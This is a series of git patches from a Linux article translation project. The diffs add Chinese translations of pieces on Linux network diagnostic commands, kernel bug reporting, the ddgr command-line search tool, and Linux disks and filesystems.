+45,13 @@ eth0 Link encap:Ethernet HWaddr 00:1e:4f:c8:43:fc Interrupt:21 Memory:fe9e0000-fea00000 ``` -输出中的 RX 和 TX 数据包计数很低。此外,没有报告错误或数据包冲突。**uptime** 命令可能会确认此系统最近才重新启动。 +输出中的 RX 和 TX 数据包计数很低。此外,没有报告错误或数据包冲突。或许可以用 `uptime` 命令确认此系统最近才重新启动。 -上面显示的广播 (Bcast) 和网络掩码 (Mask) 地址表明系统运行在 C 类等效网络(默认)上,所以本地地址范围从 192.168.0.1 到 192.168.0.254。 +上面显示的广播 (Bcast) 和网络掩码 (Mask) 地址表明系统运行在 C 类等效网络(默认)上,所以本地地址范围从 `192.168.0.1` 到 `192.168.0.254`。 ### netstat 命令 -**netstat** 命令提供有关路由和网络连接的信息。**netstat -rn** 命令显示系统的路由表。 - - +`netstat` 命令提供有关路由和网络连接的信息。`netstat -rn` 命令显示系统的路由表。192.168.0.1 是本地网关 (Flags=UG)。 ``` $ netstat -rn @@ -68,7 +62,7 @@ Destination Gateway Genmask Flags MSS Window irtt Iface 192.168.0.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0 ``` -上面输出中的 **169.254.0.0** 条目仅在你正在使用或计划使用本地链路通信时才有必要。如果不是这样的话,你可以在 **/etc/network/if-up.d/avahi-autoipd** 中注释掉相关的行: +上面输出中的 `169.254.0.0` 条目仅在你正在使用或计划使用本地链路通信时才有必要。如果不是这样的话,你可以在 `/etc/network/if-up.d/avahi-autoipd` 中注释掉相关的行: ``` $ tail -12 /etc/network/if-up.d/avahi-autoipd @@ -87,7 +81,7 @@ $ tail -12 /etc/network/if-up.d/avahi-autoipd ### netstat -a 命令 -**netstat -a** 命令将显示 **_所有_** 网络连接。为了将其限制为正在监听和已建立的连接(通常更有用),请改用 **netstat -at** 命令。 +`netstat -a` 命令将显示“所有”网络连接。为了将其限制为显示正在监听和已建立的连接(通常更有用),请改用 `netstat -at` 命令。 ``` $ netstat -at @@ -103,21 +97,9 @@ tcp6 0 0 ip6-localhost:ipp [::]:* LISTEN tcp6 0 0 ip6-localhost:smtp [::]:* LISTEN ``` -### netstat -rn 命令 - -**netstat -rn** 展示系统的路由表。192.168.0.1 是本地网关 (Flags=UG)。 - -``` -$ netstat -rn -Kernel IP routing table -Destination Gateway Genmask Flags MSS Window irtt Iface -0.0.0.0 192.168.0.1 0.0.0.0 UG 0 0 0 eth0 -192.168.0.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0 -``` - ### host 命令 -**host** 命令就像 **nslookup** 一样,用来查询远程系统的 IP 地址,但是还提供系统的邮箱处理地址。 +`host` 命令就像 `nslookup` 一样,用来查询远程系统的 IP 地址,但是还提供系统的邮箱处理地址。 ``` $ host world.std.com @@ -127,7 +109,7 @@ world.std.com mail is handled by 10 smtp.theworld.com. ### nslookup 命令 -**nslookup** 还提供系统中(本例中是本地系统)提供 DNS 查询服务的信息。 +`nslookup` 还提供系统中(本例中是本地系统)提供 DNS 查询服务的信息。 ``` $ nslookup world.std.com @@ -141,7 +123,7 @@ Address: 192.74.137.5 ### dig 命令 -**dig** 命令提供了很多有关连接到远程系统的信息 - 包括与我们通信的名称服务器以及查询需要多长时间进行响应,并经常用于故障排除。 +`dig` 命令提供了很多有关连接到远程系统的信息 - 包括与我们通信的名称服务器以及查询需要多长时间进行响应,并经常用于故障排除。 ``` $ dig world.std.com @@ -168,7 +150,7 @@ world.std.com. 78146 IN A 192.74.137.5 ### nmap 命令 -**nmap** 经常用于探查远程系统,但是同样也用于报告本地系统提供的服务。在下面的输出中,我们可以看到登录可以使用 ssh、smtp 用于电子邮箱、web 站点也是启用的,并且 ipp 打印服务正在运行。 +`nmap` 经常用于探查远程系统,但是同样也用于报告本地系统提供的服务。在下面的输出中,我们可以看到登录可以使用 ssh、smtp 用于电子邮箱、web 站点也是启用的,并且 ipp 打印服务正在运行。 ``` $ nmap localhost @@ -186,7 +168,7 @@ PORT STATE SERVICE Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds ``` -Linux 系统提供了很多有用的命令用于查看网络配置和连接。如果你都探索完了,请记住 **apropos network** 或许会让你了解更多。 +Linux 系统提供了很多有用的命令用于查看网络配置和连接。如果你都探索完了,请记住 `apropos network` 或许会让你了解更多。 -------------------------------------------------------------------------------- @@ -194,7 +176,7 @@ via: https://www.networkworld.com/article/3230519/linux/examining-network-connec 作者:[Sandra Henry-Stocker][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 823a4b55042615b40ddb6a704379813d67b86898 Mon Sep 17 00:00:00 2001 From: geekpi Date: Fri, 1 Dec 2017 09:01:08 +0800 Subject: [PATCH 0103/1627] translated --- ...layer introduction part 1 the bio layer.md | 39 ------------------- ...layer introduction part 1 the bio layer.md | 36 +++++++++++++++++ 2 files changed, 36 insertions(+), 39 deletions(-) delete mode 100644 sources/tech/20171029 A block layer introduction part 1 the bio layer.md create mode 100644 translated/tech/20171029 A block layer introduction part 1 the bio layer.md diff --git a/sources/tech/20171029 A block layer introduction part 1 the bio layer.md b/sources/tech/20171029 A block layer introduction part 1 the bio layer.md deleted file mode 100644 index 065a3720b4..0000000000 --- a/sources/tech/20171029 A block layer introduction part 1 the bio layer.md +++ /dev/null @@ -1,39 +0,0 @@ -translating---geekpi - -A block layer introduction part 1: the bio layer -============================================================ - -### A block layer introduction part 1: the bio layer - -In reply to: [A block layer introduction part 1: the bio layer][1] by amarao -Parent article: [A block layer introduction part 1: the bio layer][2]Hi, -the problem you describe here is not directly related to the block layer. It is probably a driver bug, possible a SCSI-layer bug, but definitely not a block-layer problem. -Reporting bugs against Linux is, unfortunately, a bit of a hit-and-miss affair. Some developers refused to touch bugzilla, some love it, and some (like me) only use it begrudgingly. -The alternative is to send email. For that you need to choose the right list and maybe the right developer, and you need to catch them when they are in a good mood or aren't too busy or not on holidays. Some people will make an effort to respond to everything, others are completely unpredictable - and that is for me who usually sends a patch with any bug report. If you just have a bug that you barely understand yourself, your expected response rate is probably lower. Sad, but true. - -Lots of bugs do get responded to and dealt with, but lots do not. - -I don't think it is fair to say that nobody cares, but it probably is true that nobody sees it as being as important as you do. If you want a solution, then you need to drive it. One way to drive it is to spend money on a consultant or with a support contract from a distributor. I suspect that isn't possible in your situation. Another way is to learn how the code works and find a solution yourself. Lots of people do that, but again it might not be an option for you. Another way is to keep raising the issue on different relevant forums until you get a response. Persistence can bear fruit. You would need to be prepared to perform whatever testing is asked of you, possibly including building a new kernel to test. - -If you are able to reproduce this problem on a recent kernel (4.12 or later) I suggest that you email a report to -linux-kernel@vger.kernel.org, linux-scsi@vger.kernel.org, and me (neilb@suse.com) (note that you do not need to subscribe to these lists to send mail, just send it). Describe the hardware and how to trigger the problem. -Include the stack trace of any process in "D" state. You can get this with -cat /proc/$PID/stack -where "$PID" is the pid of the process. - -Be sure to avoid complaining or saying how this has been broken for years and how it is grossly inadequate. Nobody cares about that. We do care about bugs and generally want to fix them. So just report the relevant facts. -Try to include all facts in the mail rather than via links to somewhere else. Sometimes links are necessary, but in the case of your script, it is 8 lines long so just include it in the email (and avoid descriptions like "fuckup"; just call it "broken" or similar). Also make sure your email isn't sent as HTML. We like just plain text. HTML is rejected by all @vger.kernel.org mailing lists. You might need to configure your email program to not send HTML. - --------------------------------------------------------------------------------- - -via: https://lwn.net/Articles/737655/ - -作者:[ neilbrown][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://lwn.net/Articles/737655/ -[1]:https://lwn.net/Articles/737588/ -[2]:https://lwn.net/Articles/736534/ diff --git a/translated/tech/20171029 A block layer introduction part 1 the bio layer.md b/translated/tech/20171029 A block layer introduction part 1 the bio layer.md new file mode 100644 index 0000000000..bc3f582259 --- /dev/null +++ b/translated/tech/20171029 A block layer introduction part 1 the bio layer.md @@ -0,0 +1,36 @@ +块层介绍第一部分:块 I/O 层 +============================================================ + +### 块层介绍第一部分:块 I/O 层 + +回复:amarao 在[块层介绍第一部分:块 I/O 层][1] 中提的问题 +先前的文章:[块层介绍第一部分:块 I/O 层][2] + +嗨, +你在这里描述的问题与块层不直接相关。这可能是一个驱动错误、可能是一个 SCSI 层错误,但绝对不是一个块层的问题。 +不幸的是,报告针对 Linux 的错误是一件难事。有些开发者拒绝去看 bugzilla,有些开发者喜欢它,有些(像我这样)只能勉强地使用它。 +另一种方法是发送电子邮件。为此,你需要选择正确的邮件列表,还有也许是正确的开发人员,当他们心情愉快,或者不是太忙或者不是假期时找到它们。有些人会努力回复所有,有些是完全不可预知的 - 这对我来说通常会发送一个补丁,包含一些错误报告。如果你只是有一个你自己几乎都不了解的 bug,那么你的预期响应率可能会更低。很遗憾,但这是是真的。 + +许多 bug 都会得到回应和处理,但很多 bug 都没有。 + +我不认为说没有人关心是公平的,但是没有人认为它如你想的那样重要是有可能的。如果你想要一个解决方案,那么你需要驱动它。一个驱动它的方法是花钱请顾问或者与经销商签订支持合同。我怀疑你的情况没有上面的可能。另一种方法是了解代码如何工作,并自己找到解决方案。很多人都这么做,但是这对你来说可能不是一种选择。另一种方法是在不同的相关论坛上不断提出问题,直到得到回复。坚持可以见效。你需要做好准备去执行任何你所要求的测试,可能包括建立一个新的内核来测试。 + +如果你能在最近的内核(4.12 或者更新)上复现这个 bug,我建议你邮件报告给 linux-kernel@vger.kernel.org、linux-scsi@vger.kernel.org 和我(neilb@suse.com)(注意你不必订阅这些列表来发送邮件,只需要发送就行)。描述你的硬件以及如何触发问题的。 +包含所有进程状态是 “D” 的栈追踪。你可以用 “cat /proc/$PID/stack” 来得到它,这里的 “$PID” 是进程的 pid。 + +确保避免抱怨或者说这个已经坏了好几年了以及这是多么严重不足。没有人关心这个。我们关心的是 bug 以及如何修复它。因此只要报告相关的事实就行。 +尝试在邮件中而不是链接到其他地方的链接中包含所有事实。有时链接是需要的,但是对于你的脚本,它只有 8 行,所以把它包含在邮件中就行(并避免像 “fuckup” 之类的描述。只需称它为“坏的”(broken)或者类似的)。同样确保你的邮件发送的不是 HTML 格式。我们喜欢纯文本。HTML 被所有的 @vger.kernel.org 邮件列表拒绝。你或许需要配置你的邮箱程序不发送 HTML。 + +-------------------------------------------------------------------------------- + +via: https://lwn.net/Articles/737655/ + +作者:[ neilbrown][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://lwn.net/Articles/737655/ +[1]:https://lwn.net/Articles/737588/ +[2]:https://lwn.net/Articles/736534/ From 5d8047c85b8f3bab7084900eebad9921ce850b3c Mon Sep 17 00:00:00 2001 From: geekpi Date: Fri, 1 Dec 2017 09:11:59 +0800 Subject: [PATCH 0104/1627] translating --- ...Office Is Now Available on Flathub the Flatpak App Store.md | 3 +++ .../tech/20171130 Search DuckDuckGo from the Command Line.md | 2 ++ 2 files changed, 5 insertions(+) diff --git a/sources/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md b/sources/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md index 1f8dde5784..fe72e37128 100644 --- a/sources/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md +++ b/sources/tech/20171121 LibreOffice Is Now Available on Flathub the Flatpak App Store.md @@ -1,3 +1,6 @@ +translating---geekpi + + # LibreOffice Is Now Available on Flathub, the Flatpak App Store ![LibreOffice on Flathub](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/libroffice-on-flathub-750x250.jpeg) diff --git a/sources/tech/20171130 Search DuckDuckGo from the Command Line.md b/sources/tech/20171130 Search DuckDuckGo from the Command Line.md index a54c292924..ee451a6172 100644 --- a/sources/tech/20171130 Search DuckDuckGo from the Command Line.md +++ b/sources/tech/20171130 Search DuckDuckGo from the Command Line.md @@ -1,3 +1,5 @@ +translating---geekpi + # Search DuckDuckGo from the Command Line ![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/duckduckgo.png) From 1b2f11519f4469313fae7a9daf273f60452f1d5b Mon Sep 17 00:00:00 2001 From: Yixun Xu Date: Thu, 30 Nov 2017 20:33:09 -0500 Subject: [PATCH 0105/1627] post merge fix --- ...Search DuckDuckGo from the Command Line.md | 103 ------------------ 1 file changed, 103 deletions(-) delete mode 100644 sources/tech/20171130 Search DuckDuckGo from the Command Line.md diff --git a/sources/tech/20171130 Search DuckDuckGo from the Command Line.md b/sources/tech/20171130 Search DuckDuckGo from the Command Line.md deleted file mode 100644 index ee451a6172..0000000000 --- a/sources/tech/20171130 Search DuckDuckGo from the Command Line.md +++ /dev/null @@ -1,103 +0,0 @@ -translating---geekpi - -# Search DuckDuckGo from the Command Line - - ![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/duckduckgo.png) -When we showed you how to [search Google from the command line][3] a lot of you to say you use [Duck Duck Go][4], the awesome privacy-focused search engine. - -Well, now there’s a tool to search DuckDuckGo from the command line. It’s called [ddgr][6] (pronounced, in my head, as  _dodger_ ) and it’s pretty neat. - -Like [Googler][7], ddgr is totally open-source and totally unofficial. Yup, the app is unaffiliated with DuckDuckGo in any way. So, should it start returning unsavoury search results for innocent terms, make sure you quack in this dev’s direction, and not the search engine’s! - -### DuckDuckGo Terminal App - -![](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/ddgr-gif.gif) - -[DuckDuckGo Bangs][8] makes finding stuff on DuckDuckGo super easy (there’s even a bang for  _this_  site) and, dutifully, ddgr supports them. - -Unlike the web interface, you can specify the number of search results you would like to see per page. It’s more convenient than skimming through 30-odd search results per page. The default interface is carefully designed to use minimum space without sacrificing readability. - -`ddgr` has a number of features, including: - -* Choose number of search results to fetch - -* Support for Bash autocomplete - -* Use !bangs - -* Open URLs in a browser - -* “I’m feeling lucky” option - -* Filter by time, region, file type, etc - -* Minimal dependencies - -You can download `ddgr` for various systems direct from the Github project page: - -[Download ‘ddgr’ from Github][9] - -You can also install ddgr on Ubuntu 16.04 LTS and up from a PPA. This repo is maintained by the developer of ddgr and is recommended should you want to stay up-to-date with new releases as and when they appear. - -Do note that at the time of writing the latest version of ddgr is  _not_  in the PPA, but an older version (lacking –num support) is: - -``` -sudo add-apt-repository ppa:twodopeshaggy/jarun -``` - -``` -sudo apt-get update -``` - -### How To Use ddgr to Search DuckDuckGo from the Comand Line - -To use ddgr once you installed all you need to do is pop open your terminal emulator of choice and run: - -``` -ddgr -``` - -Next enter a search term: - -``` -search-term -``` - -To limit the number of results returned run: - -``` -ddgr --num 5 search-term -``` - -To instantly open the first matching result for a search term in your browser run: - -``` -ddgr -j search-term -``` - -You can pass arguments and flags to narrow down your search. To see a comprehensive list inside the terminal run: - -``` -ddgr -h -``` - --------------------------------------------------------------------------------- - -via: http://www.omgubuntu.co.uk/2017/11/duck-duck-go-terminal-app - -作者:[JOEY SNEDDON ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://plus.google.com/117485690627814051450/?rel=author -[1]:https://plus.google.com/117485690627814051450/?rel=author -[2]:http://www.omgubuntu.co.uk/category/download -[3]:http://www.omgubuntu.co.uk/2017/08/search-google-from-the-command-line -[4]:http://duckduckgo.com/ -[5]:http://www.omgubuntu.co.uk/2017/11/duck-duck-go-terminal-app -[6]:https://github.com/jarun/ddgr -[7]:https://github.com/jarun/googler -[8]:https://duckduckgo.com/bang -[9]:https://github.com/jarun/ddgr/releases/tag/v1.1 From 7cc305ccbb9d43c369748839294246142cd5ee24 Mon Sep 17 00:00:00 2001 From: qhwdw Date: Fri, 1 Dec 2017 09:34:44 +0800 Subject: [PATCH 0106/1627] Translating by qhwdw --- .../20171127 Migrating to Linux Disks Files and Filesystems.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sources/tech/20171127 Migrating to Linux Disks Files and Filesystems.md b/sources/tech/20171127 Migrating to Linux Disks Files and Filesystems.md index 5227d5f16e..83db5e6fb0 100644 --- a/sources/tech/20171127 Migrating to Linux Disks Files and Filesystems.md +++ b/sources/tech/20171127 Migrating to Linux Disks Files and Filesystems.md @@ -1,4 +1,4 @@ -Migrating to Linux: Disks, Files, and Filesystems +Translating by qhwdw Migrating to Linux: Disks, Files, and Filesystems ============================================================ ![Migrating to LInux ](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/butterflies-807551_1920.jpg?itok=pxTxwvFO "Migrating to LInux ") From 47e01cd4b60f516f4beaf04d33e8a893d8a0d627 Mon Sep 17 00:00:00 2001 From: Yixun Xu Date: Thu, 30 Nov 2017 20:38:15 -0500 Subject: [PATCH 0107/1627] fix typo --- .../tech/20171130 Search DuckDuckGo from the Command Line.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/translated/tech/20171130 Search DuckDuckGo from the Command Line.md b/translated/tech/20171130 Search DuckDuckGo from the Command Line.md index 9bf96ecb88..d550fa75b5 100644 --- a/translated/tech/20171130 Search DuckDuckGo from the Command Line.md +++ b/translated/tech/20171130 Search DuckDuckGo from the Command Line.md @@ -13,7 +13,7 @@ [DuckDuckGo Bangs(DuckDuckGo 快捷搜索)][8] 可以帮助你轻易地在 DuckDuckGo 上找到想要的信息(甚至 _本网站_ 都有快捷搜索)。ddgr 非常忠实地呈现了这个功能。 -和网页版不同的是,你可以更改每页返回多少结果。这比起比起每次查询都要看三十多条结果要方便一些。默认界面经过了精心设计,在不影响可读性的情况下尽量减少了占用空间。 +和网页版不同的是,你可以更改每页返回多少结果。这比起每次查询都要看三十多条结果要方便一些。默认界面经过了精心设计,在不影响可读性的情况下尽量减少了占用空间。 `ddgr` 有许多功能和亮点,包括: From 091d7ad2672ab74ddb01de0a31379e573d75ede7 Mon Sep 17 00:00:00 2001 From: qhwdw Date: Fri, 1 Dec 2017 12:08:33 +0800 Subject: [PATCH 0108/1627] Translated by qhwdw --- ...ng to Linux Disks Files and Filesystems.md | 135 ------------------ ...ng to Linux Disks Files and Filesystems.md | 135 ++++++++++++++++++ 2 files changed, 135 insertions(+), 135 deletions(-) delete mode 100644 sources/tech/20171127 Migrating to Linux Disks Files and Filesystems.md create mode 100644 translated/tech/20171127 Migrating to Linux Disks Files and Filesystems.md diff --git a/sources/tech/20171127 Migrating to Linux Disks Files and Filesystems.md b/sources/tech/20171127 Migrating to Linux Disks Files and Filesystems.md deleted file mode 100644 index 83db5e6fb0..0000000000 --- a/sources/tech/20171127 Migrating to Linux Disks Files and Filesystems.md +++ /dev/null @@ -1,135 +0,0 @@ -Translating by qhwdw Migrating to Linux: Disks, Files, and Filesystems -============================================================ - -![Migrating to LInux ](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/butterflies-807551_1920.jpg?itok=pxTxwvFO "Migrating to LInux ") -Installing and using Linux on your main desktop will help you quickly become familiar with the methods and tools you need.[Creative Commons Zero][1]Pixabay - -This is the second article in our series on migrating to Linux. If you missed the first one, [you can find it here][4]. As mentioned previously, there are several reasons why you might want to migrate to Linux. You might be using or developing code for Linux in your job, or you might just want to try something new. - -In any case, having Linux on your main desktop will help you quickly become familiar with the methods and tools you’ll need. In this article, I’ll provide an introduction to Linux files, filesystems and disks. - -### Where's My C:\? - -If you are coming from a Mac, Linux should feel fairly familiar to you, as the Mac uses files, filesystems, and disks pretty closely to the way Linux does. On the other hand, if your experience is primarily Windows, accessing disks under Linux may seem a little confusing. Generally, Windows assigns a drive letter (like C:\) to each disk. Linux does not do this. Instead Linux presents a single hierarchy of files and directories for everything in your system. - -Let's look at an example. Suppose you use a computer with a main hard drive, a CD-ROM with folders called  _Books_  and  _Videos_  and a USB thumb drive with a directory called  _Transfer_ . Under Windows, you would see the following: - -``` -C:\ [Hard drive] - -├ System - -├ System32 - -├ Program Files - -├ Program Files (x86) - -└ - -D:\ [CD-ROM] - -├ Books - -└ Videos - -E:\ [USB thumb drive] - -└ Transfer -``` - -A typical Linux system would instead have this: - -``` -/ (the top most directory, called the root directory) [Hard drive] - -├ bin - -├ etc - -├ lib - -├ sbin - -├ usr - -├ - -└ media - - └ - - ├ cdrom [CD-ROM] - - │ ├ Books - - │ └ Videos - - └ Kingme_USB [USB thumb drive] - - └ Transfer -``` - -If you are using a graphical environment, usually, the file manager in Linux will present the CD-ROM and the USB thumb drive with icons that look like the device, so you may not need to know the media's specific directory. - -### Filesystems - -Linux emphasizes these things called filesystems. A filesystem is a set of structures on media (like a hard drive) that keep track of all the files and directories on the media. Without a filesystem we could store information on a hard drive, but all the data would be in a jumbled mess. We wouldn't know which blocks of data belonged to which file. You may have heard of names like Ext4, XFS, and Btrfs. These are Linux filesystem types. - -Every type of media that holds files and directories has a filesystem on it. Different media types may use specific filesystem types that are optimized for the media. So CD-ROMs use ISO9660 or UDF filesystem types. USB thumbdrives typically use FAT32 so they can be easily shared with other computer systems. - -Windows uses filesystems, too. It just doesn't talk about them as much. For example, when you insert a CD-ROM, Windows will read the ISO9660 filesystem structures, assign a drive letter to it and display the files and directories under the letter (D:\ for example). So if you're picky about details, technically Windows assigns a drive letter to a filesystem, not the whole disk. - -Using that same example, Linux will also read the ISO9660 filesystem structures, but instead of a drive letter, it will attach the filesystem to a directory (a process called mounting). Linux will then display the files and directories on the CD-ROM under the attached directory ( _/media//cdrom,_  for example). - -So to answer the question "Where's my C:\?" On Linux, there is no C:\. It works differently. - -### Files - -Windows stores files and directories (also called folders) in its filesystem. Linux, however, lets you put other things into the filesystem as well. These additional types of things are native objects in the filesystem, and they're actually different from regular files. Linux allows you to create and use hard links, symbolic links, named pipes, device nodes, and sockets, in addition to the regular files and directories. We won't get into all the types of filesystem objects here, but there are a few that are useful to know about. - -Hard links are used to create one or more aliases for a file. Each alias is a different name to the same contents on disk. If you edit the file under one file name, the changes appear under the other file names as well. For example. you might have  _MyResume_2017.doc_  also have a hard link called  _JaneDoeResume.doc_ . (Note that you can create a hard link by using the _ln_  command from the command line.) This way you can find and edit  _MyResume_2017.doc_ , then send out  _JaneDoeResume.doc_  to your prospects to help them keep track where it's from -- which will contain all your updates. - -Symbolic links are a little like Windows shortcuts. The filesystem entry contains a path to another file or directory. In a lot of ways, they work like hard links in that they can create an alias to another file. However, symbolic links can alias directories as well as files, and symbolic links can refer to items in a different filesystem on different media where hard links cannot. (Note that you can create symbolic links also with the _ln_ command, but with the  _-s_ option.) - -### Permissions - -Another big difference between Windows and Linux involves the permissions on filesystem objects (files, directories, and others). Windows implements a fairly complex set of permissions on files and directories. For example, users and groups can have permissions to read, write, execute, modify, and more. Users and groups can be given permission to access everything in a directory with exceptions, or they can be given no permission to anything in a directory with exceptions. - -Most folks using Windows don't make use of special permissions, however; so, it's surprising when they discover that a default set of permissions are used and enforced on Linux. Linux can enforce more sophisticated permissions by using SELinux or AppArmor. However most Linux installations just use the built-in default permissions. - -In the default permissions, each item in the filesystem has a set of permissions for the owner of the file, the group for the file, and for everyone else. These permissions allow for: reading, writing, and executing. The permissions have a hierarchy to them. First, it checks whether the user (the login name) is the owner and has permission. If not, then it checks whether your user (login name) is in the group for the file and the group has permission. If not, then it checks whether everyone else has permission. There are other permission settings as well, but the three sets of three are the ones most commonly used. - -If you are using the command line, and you type ls -l, you may see permissions represented as: - -``` -rwxrw-r-- 1 stan dndgrp 25 Oct 33rd 25:01 rolldice.sh -``` - -The letters at the beginning, rwxrw-r--, show the permissions. In this case, the owner (stan) can read, write, and execute the file (the first three letters, rwx); members of the group dndgrp can read and write the file but not execute (the second three letters, rw-); and everyone else can only read the file (the last three letters, r--). - -(Note that on Windows to make a script executable, you make the file's extension something specific, .bat for example. On Linux, the file's extension doesn't mean anything to the operating system. Instead its permissions need to be set so the file is executable.) - -If you get a  _permission denied_  error, chances are you are attempting to run a program or command that requires administrator privilege, or you're trying to access a file that doesn't hold permissions for your user account to access it. If you are trying to do something that requires administrator privilege, you will need to switch to the user account called  _root_  by logging in as root, or by using a helper program called  _sudo_  on the command line, which will allow you to temporarily run as root. The sudo tool will, of course, ask for a password to make sure you really should have permission. - -### Hard Drive Filesystems - -Windows predominately uses a filesystem type called NTFS for hard drives. On Linux, you get to pick which type of filesystem you want to use for the hard drive. Different types of filesystems exhibit different features and different performance characteristics. The main native Linux filesystem used today is Ext4\. However, you can choose from an abundance of filesystem types at installation time, such as: Ext3 (predecessor to Ext4), XFS, Btrfs, UBIFS (for embedded systems), and more. If you're not sure which one to use, Ext4 will work great. - - _Learn more about Linux through the free ["Introduction to Linux" ][2]course from The Linux Foundation and edX._ - --------------------------------------------------------------------------------- - -via: https://www.linux.com/blog/learn/intro-to-linux/2017/11/migrating-linux-disks-files-and-filesystems - -作者:[JOHN BONESIO][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linux.com/users/johnbonesio -[1]:https://www.linux.com/licenses/category/creative-commons-zero -[2]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux -[3]:https://www.linux.com/files/images/butterflies-8075511920jpg -[4]:https://www.linux.com/blog/learn/intro-to-linux/2017/10/migrating-linux-introduction diff --git a/translated/tech/20171127 Migrating to Linux Disks Files and Filesystems.md b/translated/tech/20171127 Migrating to Linux Disks Files and Filesystems.md new file mode 100644 index 0000000000..438b27a222 --- /dev/null +++ b/translated/tech/20171127 Migrating to Linux Disks Files and Filesystems.md @@ -0,0 +1,135 @@ +迁移到 Linux:磁盘、文件、和文件系统 +============================================================ + +![Migrating to LInux ](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/butterflies-807551_1920.jpg?itok=pxTxwvFO "Migrating to LInux ") +在你的主要桌面上安装和使用 Linux 将帮你快速熟悉你需要的工具和方法。[Creative Commons Zero][1]Pixabay + +这是我们的迁移到 Linux 系列文章的第二篇。如果你错过了第一篇,[你可以在这里找到它][4]。以前提到过,为什么要迁移到 Linux 的几个原因。你可以在你的工作中为 Linux 开发和使用代码,或者,你可能是正想去尝试一下新事物。 + +不论是什么原因,拥有一个 Linux 的主桌面,将帮助你快速熟悉你需要的工具和方法。在这篇文章中,我将介绍 Linux 的文件、文件系统和磁盘。 + +### 我的 C:\ 在哪里? + +如果你是一个 Mac 用户,Linux 对你来说应该非常熟悉,Mac 使用的文件、文件系统、和磁盘与 Linux 是非常接近的。另一方面,如果你的使用经验主要是 Windows,访问 Linux 下的磁盘可能看上去有点困惑。一般,Windows 给每个磁盘分配一个盘符(像 C:\)。而 Linux 并不是这样。而在你的 Linux 系统中它是一个单一的文件和目录的层次结构。 + +让我们看一个示例。假设你的计算机使用了一个主硬盘、一个有 _Books_ 和 _Videos_ 目录的 CD-ROM 、和一个有 _Transfer_ 目录的 U 盘,在你的 WIndows 下,你应该看到的是下面的样子: + +``` +C:\ [Hard drive] + +├ System + +├ System32 + +├ Program Files + +├ Program Files (x86) + +└ + +D:\ [CD-ROM] + +├ Books + +└ Videos + +E:\ [USB thumb drive] + +└ Transfer +``` + +而一个典型的 Linux 系统却是这样: + +``` +/ (the top most directory, called the root directory) [Hard drive] + +├ bin + +├ etc + +├ lib + +├ sbin + +├ usr + +├ + +└ media + + └ + + ├ cdrom [CD-ROM] + + │ ├ Books + + │ └ Videos + + └ Kingme_USB [USB thumb drive] + + └ Transfer +``` + +如果你使用一个图形化环境,通常,Linux 中的文件管理器将出现看起来像驱动器的图标的 CD-ROM 和 USB 便携式驱动器,因此,你根本就无需知道介质所在的目录。 + +### 文件系统 + +Linux 称这些东西为文件系统。一个文件系统是在介质(比如,硬盘)上保持跟踪所有的文件和目录的一组结构。如果没有文件系统,我们存储在硬盘上的信息就会混乱,我们就不知道哪个块属于哪个文件。你可能听到过一些名字,比如,Ext4、XFS、和 Btrfs。这些都是 Linux 文件系统。 + +每个保存有文件和目录的介质都有一个文件系统在上面。不同的介质类型可能使用了为它优化过的特定的文件系统。比如,CD-ROMs 使用 ISO9660 或者 UDF 文件系统类型。USB 便携式驱动器一般使用 FAT32,以便于它们可以很容易去与其它计算机系统共享。 + +Windows 也使用文件系统。不过,我们不过多的讨论它。例如,当你插入一个 CD-ROM,Windows 将读取 ISO9660 文件系统结构,分配一个盘符给它,然后,在盘符(比如,D:\)下显示文件和目录。当然,如果你深究细节,从技术角度说,Windows 是分配一个盘符给一个文件系统,而不是整个驱动器。 + +使用同样的例子,Linux 也读取 ISO9660 文件系统结构,但它不分配盘符,它附加文件系统到一个目录(这个过程被称为加载)。Linux 将随后在附加的目录(比如是, _/media//cdrom_ )下显示 CD-ROM 上的文件和目录。 + +因此,在 Linux 上回答 “我的 C:\ 在哪里?” 这个问题,答案是,这里没有 C:\,它们工作方式不一样。 + +### 文件 + +Windows 在它的文件系统中存在文件和目录(也被称为文件夹)。但是,Linux 也让你将其它的东西放到文件系统中。这些其它类型的东西是文件系统的原生的对象,并且,它们和普通文件实际上是不同的。除普通文件和目录之外,Linux 还允许你去创建和使用硬链接、符号链接、命名管道、设备节点、和套接字。在这里,我们不展开讨论所有的文件系统对象的类型,但是,这里有几种经常使用到的。 + +硬链接是用于为文件创建一个或者多个别名。指向磁盘上同样内容的每个别名的名字是不同的。如果在一个文件名下编辑文件,这个改变也同时出现在其它的文件名上。例如,你有一个 _MyResume_2017.doc_,它还一个被称为 _JaneDoeResume.doc_ 